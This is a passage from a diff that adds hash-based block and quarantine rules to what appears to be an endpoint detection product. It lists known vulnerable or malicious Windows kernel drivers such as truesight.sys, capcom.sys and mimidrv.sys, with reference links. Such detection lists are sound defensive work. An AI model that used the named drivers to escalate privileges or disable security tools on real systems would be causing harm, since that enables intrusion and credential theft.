+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474302Z",
+ "creation_date": "2026-03-23T11:45:30.474305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474314Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d29b1c2fff1a67d911229f36570e3d9b1cab0397d2cbc858b665403f1add3a3",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5b92a6e-367d-55d7-83b2-7458c68749ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490592Z",
+ "creation_date": "2026-03-23T11:45:31.490594Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490599Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63ed062dec8512b5aba5d56efa1dc143eefcce2fbcf01216f81a4391f68cbfaa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5cf39cc-5fb6-5de5-8a4b-8b753ff26166",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817391Z",
+ "creation_date": "2026-03-23T11:45:31.817393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817399Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05192e72245e1e5c83e5ae4a16d99322dc108ffc0efa646d01aac9ba372e1c66",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5d0f6c2-5215-531f-93f9-8ad988c3cf4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829536Z",
+ "creation_date": "2026-03-23T11:45:30.829538Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829544Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e998bb646c9bb81595fd6a221962afd563f3be775ede6fe436be1a51de2f5bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5da464e-1382-5a3e-8b64-3df9fa52e0b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820930Z",
+ "creation_date": "2026-03-23T11:45:31.820933Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820942Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ce761d6203906d8a79f26c08f04228088c3668b015fd8da5083f60a0266cd28",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5dace71-146f-5f80-9f12-43281bcfdfcd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456508Z",
+ "creation_date": "2026-03-23T11:45:30.456512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6ae324b84a4632cf690dd565954d64b205104fc3fa42181612c3f5b830579c6",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5e163df-6d31-577e-a3ac-14cd99442c61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978230Z",
+ "creation_date": "2026-03-23T11:45:29.978232Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978238Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100",
+ "comment": "Vulnerable Kernel Driver (aka t7.sys) [https://www.loldrivers.io/drivers/7196366e-04f0-4aaf-9184-ed0a0d21a75f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5f0275a-6857-543f-a784-42f11c8cf995",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617306Z",
+ "creation_date": "2026-03-23T11:45:29.617308Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617313Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11a9787831ac4f0657aeb5e7019c23acc39d8833faf28f85bd10d7590ea4cc5f",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5f81cb0-2159-57cd-a250-90417a5af573",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479793Z",
+ "creation_date": "2026-03-23T11:45:30.479795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54488a8c7da53222f25b6ed74b0dedc55d00f5fa80f4eaf6daac28f7c3528876",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f5fb0534-bc4a-5b50-a5fa-e64e112205b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481568Z",
+ "creation_date": "2026-03-23T11:45:30.481570Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3670ccd9515d529bb31751fcd613066348057741adeaf0bffd1b9a54eb8baa76",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f61acce1-deae-5ee1-a46d-088e0778ae3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826354Z",
+ "creation_date": "2026-03-23T11:45:30.826356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aaa308b8f8d30f3b0ed1cfcd50206c96f39a221f011d28825c040a685afa1de3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6230874-44fe-5505-bacd-c34c4c0638f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613546Z",
+ "creation_date": "2026-03-23T11:45:29.613548Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613553Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a2ac52a35d470dc336bae5c48a2ebf2d80519bfd57b703da6ce00ddd12163a",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6275e98-2d79-54d6-88d9-c83f42b79d0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985233Z",
+ "creation_date": "2026-03-23T11:45:29.985235Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985241Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28e09bec08688b00af1e247fa58ee4e55f2b73a06709fe37df7120a2ebee9a9f",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f635bd39-1900-58c2-b36d-35a480ee3bf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483212Z",
+ "creation_date": "2026-03-23T11:45:31.483216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e27a032f1e93ec648cd90136dc3a218bfae19fb5750f17c7a64f95680be44ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f65028c4-dea3-590d-be78-3c16ef764c6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810047Z",
+ "creation_date": "2026-03-23T11:45:31.810049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810057Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eadb4af39567771fec339b58c3c5d1f4aa652443cb3f1915314fafdb6d80de30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f650d985-4e93-54c2-9fd1-21b9aa5e9723",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616204Z",
+ "creation_date": "2026-03-23T11:45:29.616206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bddf1750dc00725c1384b34740e798b4f5f70218ab71ac62a5a96773b377df5a",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f656fa1f-65e0-5d26-9892-dd0a78b62b98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476900Z",
+ "creation_date": "2026-03-23T11:45:31.476904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bb6c306e7f1d806ddf24e07507e4ecb3594f94010da3fc11fa438ffc51b5620",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f659437c-a3ae-5d80-ad9c-4f96f6f7ef12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468346Z",
+ "creation_date": "2026-03-23T11:45:30.468349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9cba07502b8a10034ddf75b35f4d6f2a24862cde5bff300720f5df04d4cfe6b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f65f32bc-46a9-5624-a812-97985cc42806",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610280Z",
+ "creation_date": "2026-03-23T11:45:29.610282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ee59eb28688e73d10838c66e0d8e011c8df45b6b43a4ac5d0b75795ca3eb512",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f66e9787-2669-5c7b-9a98-15ec7ac77b03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829465Z",
+ "creation_date": "2026-03-23T11:45:30.829467Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad5684e36e6fabe7abdd6dba1a09f8e2dce00634c6e7c8adb71b49bed95ae354",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f6731b03-4a6f-544b-8b97-d740e0bb841f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156362Z",
+ "creation_date": "2026-03-23T11:45:31.156364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03dc780cb03df809eb88ba478dd65a48ecbc887963fca4c7bb7325d7677d0bfe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f68ec9d1-ef90-5d1e-9e35-b0baa19049a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454095Z",
+ "creation_date": "2026-03-23T11:45:30.454099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1284a1462a5270833ec7719f768cdb381e7d0a9c475041f9f3c74fa8eea83590",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f69b839e-1787-523f-8eaa-1eba964966d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809729Z",
+ "creation_date": "2026-03-23T11:45:31.809733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809741Z",
